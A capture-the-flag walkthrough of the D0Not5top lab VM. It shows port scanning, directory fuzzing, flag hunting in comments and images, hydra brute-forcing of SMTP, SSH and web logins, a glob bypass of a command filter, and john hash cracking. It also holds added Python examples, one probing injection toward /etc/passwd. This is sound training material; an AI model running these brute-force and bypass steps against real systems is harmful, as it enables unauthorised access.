Walkthrough by DigiP

Thanks to DigiP for sending me this walkthrough write-up. You really helped me iron out the kinks in this one ;D

(Note: Target IP changes multiple times, as DigiP had revisited this multiple times)

netdiscover
192.168.1.135   08:00:27:de:4c:05      4     240  PCS Systemtechnik Gmb
 
nmap -sC -p- -A --open -T4 192.168.1.135
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-08 20:05 EDT
Nmap scan report for D0Not5top (192.168.1.135)
Host is up (0.00042s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 a7:52:df:39:80:7c:66:16:2f:fd:f7:7b:80:13:09:85 (DSA)
|   2048 bf:d9:5a:22:54:91:cc:36:40:3c:e6:35:4f:8e:0c:78 (RSA)
|_  256 16:e6:84:e1:5f:80:bc:27:6a:50:01:55:f0:c0:cc:72 (ECDSA)
25/tcp    open  smtp    Exim smtpd
| smtp-commands: D0Not5top Hello D0Not5top [192.168.1.66], SIZE 52428800, 8BITMIME, PIPELINING, HELP,
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp    open  domain  PowerDNS 3.4.1
| dns-nsid:
|   NSID: D0Not5top (44304e6f7435746f70)
 
echo 44304e6f7435746f70 | xxd -r -p
D0Not5top
 
|   id.server: D0Not5top
|_  bind.version: PowerDNS Authoritative Server 3.4.1 ([email protected] built 20170111224403 [email protected])
80/tcp    open  http    Apache httpd
| http-robots.txt: 22 disallowed entries (15 shown)
| /games /dropbox /contact /blog/wp-login.php
| /blog/wp-admin /search /support/search.php
| /extend/plugins/search.php /plugins/search.php /extend/themes/search.php
|_/themes/search.php /support/rss /archive/ /wp-admin/ /wp-content/
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42637/tcp  status
|_  100024  1          49367/udp  status
42637/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:DE:4C:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms D0Not5top (192.168.1.135)
 
nikto -h 192.168.1.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.135
+ Target Hostname:    192.168.1.135
+ Target Port:        80
+ Start Time:         2017-04-08 20:19:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Server leaks inodes via ETags, header found with file /, fields: 0xd3 0x54c550ee22d56
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /games/: Directory indexing found.
+ Entry '/games/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/dropbox/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/contact/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/archive/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-content/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/comment-page-/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/trackback/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ Entry '/blackhole/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/mint/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/feed/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 26 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-admin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7563 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time:           2017-04-08 20:20:13 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
 
view-source:http://192.168.1.135/
 
<h1>
#########################################<br>
# D0Not5top UnT1l Y0uw H4v3 Cr4cK3d L45T_fl46.pl F1l3 #<br>
#########################################
</h1>
<h3>3nj0iy H0p35 Y0iu D0<br>
Mucho 3mrgnc3 :D
</h3>
 
curl -v -X OPTIONS http://192.168.1.135/games/
 
 
http://192.168.1.135/phpmyadmin/
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://192.168.1.135/FUZZ/
 
We find:
http://192.168.1.135/control/
 
 <!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w -->
 
gobuster -u http://192.168.1.28/control/ -f -e -x html,jpg,css,txt,png,gif,lock,zip,git,php -w /usr/share/wordlists/dirb/common.txt
 
http://192.168.1.28/control/hosts.txt
127.0.0.1   localhost
127.0.0.1   D0Not5top.ctf
#127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05
 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
 
gobuster -u http://192.168.1.28 -f -e -x php,html,txt -w /mnt/HDD2/wordlists/drupal-modules.lst
 
 
http://192.168.1.28/poweradmin/ (Status: 200)
Throwing some more wordlists at the site, we find a new directory: "poweradmin"
 
http://192.168.1.28/poweradmin/
 
Looking at https://github.com/poweradmin/poweradmin I can see what directories I might not find locally. /sql looks interesting, but none of the passwords seem to work for the login page.
 
Eventually, I gave up, as I have no idea what the user name is, so bruting seems less desirable at the moment.
 
Back to http://192.168.1.28/control/ view source
 
<!-- M3gusta said he hasn't had time to get this w0rKING. Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r,
Just Couldnt [email protected] Da D0Not5topMe.ctf --!>
 
http://192.168.1.28/control/js/
 
http://192.168.1.135/control/js/README.MadBro
 
 
###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...   #
# 1T'5 D0Not5topMe.ctf !!!!                               #
# 1M 00T4 H33R..                                          #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################
 
                FL101110_10:111101011101    > FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2 (not sure if this is right, but it's a flag)
                1r101010q10svdfsxk1001i1    >
                11ry100f10srtr1100010h10    >
 
 
                                             
Logging into 192.168.1.135 on port 25, we see what seems to be a string of hexadecimal. Decoding it we get our 3rd flag:
FL46_3:29dryf67uheht2r1dd4qppuey474svxya This would be flag 3??
 
Set an entry in our hosts file to:
192.168.1.135   d0not5topme.ctf
 
Then navigate to http://d0not5topme.ctf which loads a phpBB forum page
 
<a class="feed-icon-forum" title="Feed - Worka Suko Gameo Di Besto" href="/app.php/feed?sid=f1b832bd60328d4410df85af71af7da0?f=1">
<i class="icon fa-rss-square fa-fw icon-orange" aria-hidden="true"></i><span class="sr-only">Feed - Worka Suko Gameo Di Besto</span>
</a>
 
 
http://D0Not5topMe.ctf/adm/ (Status: 302)
http://D0Not5topMe.ctf/assets/ (Status: 200)
http://D0Not5topMe.ctf/bin/ (Status: 200)
http://D0Not5topMe.ctf/cache/ (Status: 200)
http://D0Not5topMe.ctf/common.php (Status: 200)
http://D0Not5topMe.ctf/composer.lock (Status: 200)
http://D0Not5topMe.ctf/config/ (Status: 200)
http://D0Not5topMe.ctf/config.php (Status: 200)
http://D0Not5topMe.ctf/cron.php (Status: 200)
http://D0Not5topMe.ctf/docs/ (Status: 200)
http://D0Not5topMe.ctf/download/ (Status: 200)
http://D0Not5topMe.ctf/ext/ (Status: 200)
http://D0Not5topMe.ctf/faq.php (Status: 301)
http://D0Not5topMe.ctf/files/ (Status: 200)
http://D0Not5topMe.ctf/feed.php (Status: 301)
http://D0Not5topMe.ctf/images/ (Status: 200)
http://D0Not5topMe.ctf/includes/ (Status: 200)
http://D0Not5topMe.ctf/index.php/ (Status: 200)
http://D0Not5topMe.ctf/index.php (Status: 200)
http://D0Not5topMe.ctf/language/ (Status: 200)
http://D0Not5topMe.ctf/manual/ (Status: 200)
http://D0Not5topMe.ctf/mcp.php (Status: 200)
http://D0Not5topMe.ctf/phpBB3/ (Status: 200)
http://D0Not5topMe.ctf/phpbb/ (Status: 200)
http://D0Not5topMe.ctf/posting.php (Status: 200)
http://D0Not5topMe.ctf/report.php (Status: 301)
http://D0Not5topMe.ctf/search.php (Status: 200)
http://D0Not5topMe.ctf/store/ (Status: 200)
http://D0Not5topMe.ctf/styles/ (Status: 200)
http://D0Not5topMe.ctf/ucp.php (Status: 200)
http://D0Not5topMe.ctf/vendor/ (Status: 200)
http://D0Not5topMe.ctf/viewonline.php (Status: 200)
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://d0not5topme.ctf/FUZZ/
http://d0not5topme.ctf/bin/phpbbcli.php
 
#!/usr/bin/env php
This program must be run from the command line.
 
Trying to register on the forum and forcing an error in the form, we get the email address for a new host:
http://d0not5topme.ctf/ucp.php?mode=register&sid=f1b832bd60328d4410df85af71af7da0
 
[email protected]
 
 
Discovered user "Megusta" on the phpBB by adding them as a friend; the site confirmed it in the friends list. Wrong names show an error.
 
http://d0not5topme.ctf/ucp.php?mode=sendpassword
reset password for "Megusta" with email "[email protected]"
If only we could find a way to read that email.
 
 
hydra -s 25 -l [email protected] -P /root/passwords/siph0n.txt -t 1 -w 20 -f 192.168.1.28 smtp  
 
Normally for POP3 email we'd want to log in over 110, but for sending, we can verify a user and pass using port 25, SMTP.
https://securityblog.gr/2067/brute-forcing-smtp-with-hydra/
This may be fruitless, as the op may never have actually set up an email account for that user, but we try just in case,
which could help us verify the password (if reused) quicker than butting heads against the 3-try lockout via phpBB.
 
After trying manually, AUTH LOGIN does not seem to be enabled, and no relay is allowed, so brute forcing looks to be a no-go and a waste of time.
 
Moving on, new host:
 
192.168.1.135   G4M35.ctf
 
http://g4m35.ctf/
 
In the browser console, we can hack the game to build no walls and beat the game:
MG.BARRIER_PATH_IDS = {}
MG.BARRIER_PATH_IDS[MG.BarrierType.RANDOM] = '';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_1] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_2] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_3] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_4] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_5] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_6] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BLANK] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.START] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.FINISH] = 'barrier-path-finish';
 
We can shortcut this in game.js and look for:
 GAME_OVER: {
            title: function () {return '/H3x6L64m3';},
 
This will lead us to the directory for http://g4m35.ctf/H3x6L64m3/
 
 
http://g4m35.ctf/H3x6L64m3/
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://g4m35.ctf/H3x6L64m3/FUZZ/
 
Fuzzing, we find the textures directory and grab the bit of octal code embedded in the images for the second game. We get flag 5.
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/nz.jpg
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/pz.jpg
 
The decoded octal code in the above images reads:
FL46_5:09k87h6g4e25gh44wa1rybyfi898hncdt
 
After beating the next game, you get another URL for our hosts file as a watermark at the end. (I suggest you get ready to hit print screen at the end of the race to see the URL)
 
We add to hosts file.
 
192.168.1.135   t3rm1n4l.ctf
 
http://t3rm1n4l.ctf/
 
You can also find the URL in - http://g4m35.ctf/H3x6L64m3/bkcore/hexgl/Gameplay.js line 174
 
Password required. Did we get one?
 
http://t3rm1n4l.ctf/
 
curl -v -X POST 'http://t3rm1n4l.ctf/term.php' -H 'Pragma: no-cache' -H 'Origin: http://t3rm1n4l.ctf' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: GameTerminal' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://t3rm1n4l.ctf/index.php' -H 'DNT: 1' --data 'command=a -lash' --compressed
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301,400 http://t3rm1n4l.ctf/FUZZ.php
 
wfuzz -c -z file,/root/passwords/10_million_password_list_top_1000000.txt --hc 404,301,400 http://t3rm1n4l.ctf/FUZZ.php
 
source code for our terminal emulator:
https://github.com/Fluidbyte/PHP-jQuery-Terminal-Emulator/blob/master/term.php
 
I had to test this to be sure, as I tried the URL in the field for the password and received AUTHENTICO!, so I used hydra just to be sure.
 
hydra -l "" -p t3rm1n4l.ctf t3rm1n4l.ctf http-post-form "/term.php:command=^PASS^:t3rm1n4l.ctf Passwordo Requireo"
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-04-09 13:08:21
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: t3rm1n4l.ctf   password: t3rm1n4l.ctf
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-04-09 13:08:32
 
 
It will only execute a few commands, it seems.
 
We can test this again with curl
curl -v -X POST http://t3rm1n4l.ctf/term.php --data "command=t3rm1n4l.ctf"
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 192.168.1.135...
* TCP_NODELAY set
* Connected to t3rm1n4l.ctf (192.168.1.135) port 80 (#0)
> POST /term.php HTTP/1.1
> Host: t3rm1n4l.ctf
> User-Agent: curl/7.52.1
> Accept: */*
> Content-Length: 20
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 20 out of 20 bytes
< HTTP/1.1 200 OK
< Date: Sun, 09 Apr 2017 13:06:24 GMT
< Server: Apache
< Set-Cookie: PHPSESSID=fleo1km3g37osr53jqkd6u7687; expires=Sun, 09-Apr-2017 13:06:34 GMT; Max-Age=10; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
* Curl_http_done: called premature == 0
* Connection #0 to host t3rm1n4l.ctf left intact
AUTHENTICO!
 
So. Authenticated, but what commands can we run to get the next flag????
 
 
 
http://t3rm1n4l.ctf
 
t3rm1n4l.ctf Passwordo Requireo:
password
t3rm1n4l.ctf Passwordo Requireo:
dir
t3rm1n4l.ctf Passwordo Requireo:
pwd
t3rm1n4l.ctf Passwordo Requireo:
t3rm1n4l.ctf
AUTHENTICO!
dir
ERROR: Megusto ere no no!
pwd
/usr/share/nginx/html
dir
t3rm1n4l.ctf Passwordo Requireo:
pwd
t3rm1n4l.ctf Passwordo Requireo:
t3rm1n4l.ctf
AUTHENTICO!
pwd
/usr/share/nginx/html
 
 
6 commands seem to work, but do nothing really: pwd, uname, grep, id, ip, and who.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
who returns empty until you hit enter twice for some reason. Basic commands like ls, cat, nano, echo, etc, all return:
ERROR: Megusto ere no no!
 
I realized after playing with these commands that it's stripping all punctuation. It didn't, however, strip *.
 
I tried:
grep * *
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory
grep: AAAAAAAAAAA: Is a directory
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory
 
boom!
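The filter behaviour just observed (punctuation stripped, `*` left alone, six allowlisted programs) is modelled below as an added example; this is not the page's term.php nor the Fluidbyte project's code, and the command names and error string are taken from the write-up only to make the model recognisable. The vulnerable version returns a string that still reaches a shell, so the surviving `*` is glob-expanded there; the hardened version allowlists the program, validates each argument character by character and returns an argv list for `subprocess.run(argv)` with `shell=False`, so nothing is ever globbed or interpreted.

```python
import string

# Constructed model of the t3rm1n4l.ctf command filter described above.
# Not the page's term.php; it only reproduces the behaviour the write-up
# observed: punctuation stripped except '*', six commands allowed.
ALLOWED = {"pwd", "uname", "grep", "id", "ip", "who"}
ERROR = "ERROR: Megusto ere no no!"
STRIPPED = set(string.punctuation) - {"*"}      # '*' survives the filter
SAFE_ARG_CHARS = set(string.ascii_letters + string.digits + "_-.")


def vulnerable_filter(command: str) -> str:
    """Strip punctuation, then allowlist the first word.

    Returns the line that would be handed to a shell, or ERROR.  Because
    the line still reaches a shell, a surviving '*' is glob-expanded there,
    so an allowlisted program can be pointed at every name in the cwd.
    Note also that stripping ';' and '/' does not block anything: it just
    turns the rest of the line into extra arguments for the allowed program.
    """
    cleaned = "".join(ch for ch in command if ch not in STRIPPED)
    words = cleaned.split()
    if not words or words[0] not in ALLOWED:
        return ERROR
    return " ".join(words)


def hardened_filter(command: str):
    """Allowlist the program and validate each argument; return an argv
    list meant for subprocess.run(argv) with shell=False, so no shell ever
    sees the input and nothing is globbed.  Anything outside the safe
    character set ('*', '/', ';', quotes, ...) or a '..' is rejected.
    """
    words = command.split()
    if not words or words[0] not in ALLOWED:
        return ERROR
    for arg in words[1:]:
        if not set(arg) <= SAFE_ARG_CHARS or ".." in arg:
            return ERROR
    return words


if __name__ == "__main__":
    for probe in ("pwd", "grep * *", "id; cat /etc/passwd", "cat /etc/passwd"):
        print(f"{probe!r:24} vulnerable -> {vulnerable_filter(probe)!r}")
        print(f"{'':24} hardened   -> {hardened_filter(probe)!r}")
```

The `id; cat /etc/passwd` probe shows the second weakness of blacklist stripping: the filter does not refuse the line, it silently rewrites it into `id cat etcpasswd`, so the operator gets no signal that an injection attempt was made, whereas the hardened version returns the error and can log it.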
 
We got another domain name to add to our hosts file!
 
M36u574.ctf
 
(each of these domains exhibits something a little different)
 
When first viewing the site, we see a series of images scrolling by. It's actually refreshing the page and loading a new image each time. One of them is kingmegusta.jpg. We run exiftool and grab the comments, which are base64 encoded. Decoding, we get a password hash.
 
exiftool kingmegusta.jpg
MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30
 
We fire up john (although I have a feeling this password is trolling us with something something megusta).
john hashes -w=/root/passwords/siph0n.txt --fork=16
 
MeGustaKing:**********
 
password is "**********" 10 asterisks.
 
Op is straight up trolling us..dickbutt.
 
[email protected]:~/ctf/D0Not5top# ssh MeGustaKing[email protected]
 
 
[email protected]'s password:
ERROR!
TRACE: sshPr0xy.py line:550 <CODE>U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==</CODE>
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 
Last login:Sat Apr  1 00:00:01 2017 from R0cKy0U.7x7
Welcome to rush shell
Lets you update your FunNotes and more!
 
Uh0h.. u n0 burtieo
h35 da 54wltyD4w6 y0u...
Gw04w4y :(
Local configuration error occurred.
Contact the systems administrator for further assistance.
Connection to 192.168.1.28 closed.
 
U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==
 
 
 
After some time playing on this, op messaged me on twitter. There is a typo in the flag 6 from our ssh error message. The following is what it should have been. Thanks op..
 
U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==
 
echo U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg== | base64 -d
Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$&
 
echo Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK | base64 -d
 
And we have flag 6. Still, we need a way in to get root, as the 7th and final flag is gained after rooting the box.
FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey
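The two decode steps above can be done in one pass once you notice what the blob is: the outer base64 decodes to the 8-byte `Salted__` magic that `openssl enc -salt` writes, followed by 8 salt bytes and then the payload. Real `openssl enc` output would be ciphertext, but here the payload is just a second base64 string with some junk bytes around it. The following is an added example, not code from the write-up or from the CTF author; it parses the header, then scans the payload for base64 runs long enough to be deliberate and decodes any that yield printable text. The two input strings are the ones quoted above (the blob as posted in the ssh error, and the corrected one).

```python
import base64
import re

OPENSSL_MAGIC = b"Salted__"          # header written by `openssl enc -salt`
# A run of base64 alphabet at least 20 chars long; shorter runs occur by
# chance inside binary data, 20+ almost never does.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")

# Both strings are quoted from the write-up above.
AS_POSTED = "U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg=="
CORRECTED = "U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg=="


def split_openssl_blob(blob: bytes):
    """Return (salt, body) if blob carries the OpenSSL salted header, else None."""
    if len(blob) < 16 or not blob.startswith(OPENSSL_MAGIC):
        return None
    return blob[8:16], blob[16:]


def salt_of(outer_b64: str):
    """Salt bytes of a base64-wrapped OpenSSL blob, or None if not salted."""
    parts = split_openssl_blob(base64.b64decode(outer_b64))
    return parts[0] if parts else None


def embedded_tokens(outer_b64: str) -> list:
    """Decode the outer base64, skip the Salted__ header, and return every
    printable string recovered from base64 runs embedded in the payload.
    Genuine ciphertext yields an empty list; a hand-built blob that merely
    wraps a base64 flag (as in the corrected string) yields the flag."""
    blob = base64.b64decode(outer_b64)
    parts = split_openssl_blob(blob)
    body = parts[1] if parts else blob
    found = []
    for match in B64_RUN.finditer(body):
        run = match.group(0)
        run = run[: len(run) - len(run) % 4]      # drop a ragged tail
        try:
            text = base64.b64decode(run, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        text = text.strip()
        if text and text.isprintable():
            found.append(text)
    return found


if __name__ == "__main__":
    for label, blob in (("as posted", AS_POSTED), ("corrected", CORRECTED)):
        print(f"{label}: salt={salt_of(blob)!r} tokens={embedded_tokens(blob)}")
```

Run as-is, the blob from the ssh error message produces no token (its payload is real ciphertext, which is why guessing at it went nowhere), while the corrected blob produces `FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey`. The 0xEF 0xBF 0xBD sequences around the inner string are UTF-8 for U+FFFD, the replacement character, which is what turned the original salt and ciphertext into the `�` characters visible in the `base64 -d` output above.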
 
Looks like the name it wants might be burtieo. What the password is, though, I don't know, but R0cKy0U.7x7 probably refers to the rockyou.txt wordlist.
 
I first grepped this for certain words combined with my own, as the whole rockyou list would take like 40 days to brute over ssh... XD
 
hydra -l burtieo -P /mnt/HDD2/ctf/D0Not5top/passwords ssh://192.168.1.28
No go, so trying the whole rockyou.txt list and hoping it's near the top of the file.
 
 
hydra -l burtieo -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.28
 
[22][ssh] host: 192.168.1.28   login: burtieo   password: Lets you update your FunNotes and more!
 
 
ssh [email protected]
[email protected]'s password:
"Lets you update your FunNotes and more!"
 
ERROR!
TRACE: sshPr0xy.py line:550 <CODE>U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==</CODE>
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 
Last login:Sat Apr  1 00:00:01 2017 from R0cKy0U.7x7
Welcome to rush shell
Lets you update your FunNotes and more!
 
Uh0h.. u n0 burtieo
h35 da 54wltyD4w6 y0u...
Gw04w4y :(
W2wC0m3 Bw3rtie0 :)
[email protected]:~$ id
-rbash: id: command not found
[email protected]:~$
 
 
The rbash shell is no fun, and he's further restricted us from using / and other syntax.
 
password:
Lets you update your FunNotes and more!
 
 
So far here is what I have found
[email protected]:~$ pwd
/home/burtie
[email protected]:~$ export
declare -x HOME="/home/burtie"
declare -x LANG="en_GB.UTF-8"
declare -x LANGUAGE="en_GB:en"
declare -x LOGNAME="burtieo"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:"
declare -x MAIL="/var/mail/burtieo"
declare -x OLDPWD
declare -rx PATH="/usr/sbin/bin"
declare -x PWD="/home/burtie"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.1.66 52682 22"
declare -x SSH_CONNECTION="192.168.1.66 52682 192.168.1.28 22"
declare -x SSH_TTY="/dev/pts/0"
